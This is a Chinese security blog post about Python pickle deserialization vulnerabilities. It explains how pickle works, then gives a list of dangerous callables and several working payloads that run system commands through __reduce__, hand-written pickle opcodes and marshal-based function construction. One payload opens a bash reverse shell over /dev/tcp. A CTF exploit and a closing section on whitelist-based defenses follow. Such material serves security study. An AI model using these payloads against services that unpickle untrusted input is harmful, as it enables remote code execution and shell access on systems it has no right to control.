python pickle反序列漏洞

0x00 Python对象序列化库 pickle

简介

与其他语言相同,python也有序列化/反序列化的方式

python序列化主要有picklemarshaljson三种

pickle库: https://docs.python.org/zh-cn/3/library/pickle.html

  • marshal 模块更加原始,一般 pickle 是序列化Python对象时的首选。
  • JSON 序列化输出文本格式,可直观阅读。pickle 序列化输出二进制格式,不能直观阅读。
  • JSON 只能序列化Python内置类型,不能表示自定义的类。pickle可以表示大量的 Python 数据类型,包括用户自定义的类。
  • JSON 兼容性更好,而 pickle 是 Python 专用的。

用法

序列化

输出为文件对象:
pickle.dump(obj, file, protocol=None, *, fix_imports=True)

输出为 bytes 对象:
pickle.dumps(obj, protocol=None, *, fix_imports=True)

反序列化

从文件对象中读取 pickle 对象:
pickle.load(file, *, fix_imports=True, encoding="ASCII", errors="strict")

从 bytes 对象中读取 pickle 对象:
pickle.loads(bytes_object, *, fix_imports=True, encoding="ASCII", errors="strict")

protocol 数据流格式

用于 pickling 的协议共有5种,使用的协议版本越高,读取生成的 pickle 所需的 Python 版本就要越新

只有 protocol = 0 的输出是可读的,其他版本均含有不可见字符

pickletools

分析pickle序列化数据的工具
mLQ2rt.png

0x01 Python反序列化漏洞

__reduce__ 方法

https://docs.python.org/zh-cn/3.7/library/pickle.html#object.__reduce__

__reduce__ 方法在序列化的时候会完全改变被序列化的对象

  • 如果返回值是一个字符串,那么将会去查找字符串值对应名字的对象,将其序列化之后返回
  • 如果返回值是元组(2到5个参数),第一个参数是可调用(callable)的对象,第二个是该对象所需的参数元组,剩下三个可选

这里是用第二种返回值来构造执行命令的payload

1
2
3
4
5
6
7
8
9
import pickle
import os
class A(object):
def __reduce__(self):
return (os.system,('id',))

p = pickle.dumps(A())
print([p])
print(pickle.loads(p))

这里使用python2的话需要类继承自object,而python3则不需要

不继承object
mLGzvQ.png

继承object
mLGxgg.png

有用的函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
eval, execfile, compile, open, file, map, input,
os.system, os.popen, os.popen2, os.popen3, os.popen4, os.open, os.pipe,
os.listdir, os.access,
os.execl, os.execle, os.execlp, os.execlpe, os.execv,
os.execve, os.execvp, os.execvpe, os.spawnl, os.spawnle, os.spawnlp, os.spawnlpe,
os.spawnv, os.spawnve, os.spawnvp, os.spawnvpe,
pickle.load, pickle.loads,cPickle.load,cPickle.loads,
subprocess.call,subprocess.check_call,subprocess.check_output,subprocess.Popen,
commands.getstatusoutput,commands.getoutput,commands.getstatus,
glob.glob,
linecache.getline,
shutil.copyfileobj,shutil.copyfile,shutil.copy,shutil.copy2,shutil.move,shutil.make_archive,
dircache.listdir,dircache.opendir,
io.open,
popen2.popen2,popen2.popen3,popen2.popen4,
timeit.timeit,timeit.repeat,
sys.call_tracing,
code.interact,code.compile_command,codeop.compile_command,
pty.spawn,
posixfile.open,posixfile.fileopen,
platform.popen

input 函数

python2中,input函数能用执行代码

1
2
3
4
5
6
7
8
daolgts@DESKTOP-4DDBUKG:~$ python
Python 2.7.15+ (default, Nov 27 2018, 23:36:35)
[GCC 7.3.0] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> input("")
__import__('os').system('id')
uid=1000(daolgts) gid=1000(daolgts) groups=1000(daolgts),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(lxd),114(netdev)
0

payload:

1
2
3
4
5
6
7
# 反弹shell
a='''c__builtin__\nsetattr\n(c__builtin__\n__import__\n(S'sys'\ntRS'stdin'\ncStringIO\nStringIO\n(S'__import__('os').system('bash -c "bash -i >& /dev/tcp/127.0.0.1/12345 0<&1 2>&1"')'\ntRtRc__builtin__\ninput\n(S'python> '\ntR.'''

# 修改*****为自定义命令
a='''c__builtin__\nsetattr\n(c__builtin__\n__import__\n(S'sys'\ntRS'stdin'\ncStringIO\nStringIO\n(S'__import__('os').system('*****')'\ntRtRc__builtin__\ninput\n(S'python> '\ntR.'''

pickle.loads(a)

任意函数构造

https://checkoway.net/musings/pickle/

types.FunctionType 配上 marshal.loads

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
import base64
import marshal
import pickle

def foo():
import os
os.system('whoami')

payload1="""ctypes
FunctionType
(cmarshal
loads
(cbase64
b64decode
(S'%s'
tRtRc__builtin__
globals
(tRS''
tR(tR."""%base64.b64encode(marshal.dumps(foo.func_code))

print [payload1]
pickle.loads(payload1)

payload2="""ctypes
FunctionType
(cmarshal
loads
(S'%s'
tRc__builtin__
globals
(tRS''
tR(tR."""%marshal.dumps(foo.func_code).encode('string-escape')

print [payload2]
pickle.loads(payload2)

new.function 配上 marshal.loads

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
import base64
import marshal
import pickle

def foo():
import os
# os.system('bash -c "bash -i >& /dev/tcp/127.0.0.1/12345 0<&1 2>&1"')
os.system('whoami')

payload1="""cnew
function
(cmarshal
loads
(cbase64
b64decode
(S'%s'
tRtRc__builtin__
globals
(tRS''
tR(tR."""%base64.b64encode(marshal.dumps(foo.func_code))

print [payload1]
pickle.loads(payload1)


payload2="""cnew
function
(cmarshal
loads
(S'%s'
tRc__builtin__
globals
(tRS''
tR(tR."""%marshal.dumps(foo.func_code).encode('string-escape')

print [payload2]
pickle.loads(payload2)

类函数

payload:

1
payload=pickle.dumps(new.classobj('system', (), {'__getinitargs__':lambda self,arg=('id',):arg, '__module__': 'os'})())
1
2
3
4
5
6
7
>>> import new
>>> payload=pickle.dumps(new.classobj('system', (), {'__getinitargs__':lambda self,arg=('id',):arg, '__module__': 'os'})())
>>> payload
"(S'id'\np1\nios\nsystem\np2\n(dp3\nb."
>>> pickle.loads(payload)
uid=1000(daolgts) gid=1000(daolgts) groups=1000(daolgts),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(lxd),114(netdev)
0

手动构造 pickle code

前面说到 protocol = 0 时 pickle code 是可读的,也可以手动构造pickle code

https://www.leavesongs.com/PENETRATION/code-breaking-2018-python-sandbox.html#pickle-code

c:引入模块和对象,模块名和对象名以换行符分割。(find_class校验就在这一步,也就是说,只要c这个OPCODE的参数没有被find_class限制,其他地方获取的对象就不会被沙盒影响了,这也是我为什么要用getattr来获取对象)

(:压入一个标志到栈中,表示元组的开始位置

t:从栈顶开始,找到最上面的一个(,并将(t中间的内容全部弹出,组成一个元组,再把这个元组压入栈中

R:从栈顶弹出一个可执行对象和一个元组,元组作为函数的参数列表执行,并将返回值压入栈上

p:将栈顶的元素存储到memo中,p后面跟一个数字,就是表示这个元素在memo中的索引

VS:向栈顶压入一个(unicode)字符串

.:表示整个程序结束

anapickle

Toolset for writing shellcode in Python’s Pickle language and for manipulating pickles to inject shellcode.

https://github.com/sensepost/anapickle

0x02 CTF 题目

code-breaking picklecode

https://github.com/phith0n/code-breaking/tree/master/2018/picklecode

wp: https://www.leavesongs.com/PENETRATION/code-breaking-2018-python-sandbox.html#

SUCTF2019 guess_game

https://github.com/team-su/SUCTF-2019/tree/master/Misc/guess_game

wp: https://github.com/rmb122/suctf2019_guess_game/tree/master/writeup

exp:

1
2
3
4
5
6
7
exp = b'''cguess_game
game
}S"win_count"
I10
sS"round_count"
I9
sbcguess_game.Ticket\nTicket\nq\x00)\x81q\x01}q\x02X\x06\x00\x00\x00numberq\x03K\x01sb.'''

0x03 防御

Restricting Globals

使用官方推荐的find_class方法,使用白名单限制反序列化引入的对象

https://docs.python.org/3.7/library/pickle.html#pickle-restrict

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
import builtins
import io
import pickle

safe_builtins = {
'range',
'complex',
'set',
'frozenset',
'slice',
}

class RestrictedUnpickler(pickle.Unpickler):

def find_class(self, module, name):
# Only allow safe classes from builtins.
if module == "builtins" and name in safe_builtins:
return getattr(builtins, name)
# Forbid everything else.
raise pickle.UnpicklingError("global '%s.%s' is forbidden" %
(module, name))

def restricted_loads(s):
"""Helper function analogous to pickle.loads()."""
return RestrictedUnpickler(io.BytesIO(s)).load()

pickleFilter

https://github.com/Qianlitp/pickleFilter/

利用对 load_reduce 函数添加装饰器,拦截了不信任的可调用对象,一定程度上减少 pickle模块 反序列缺陷所造成的危害。

0x04 Referer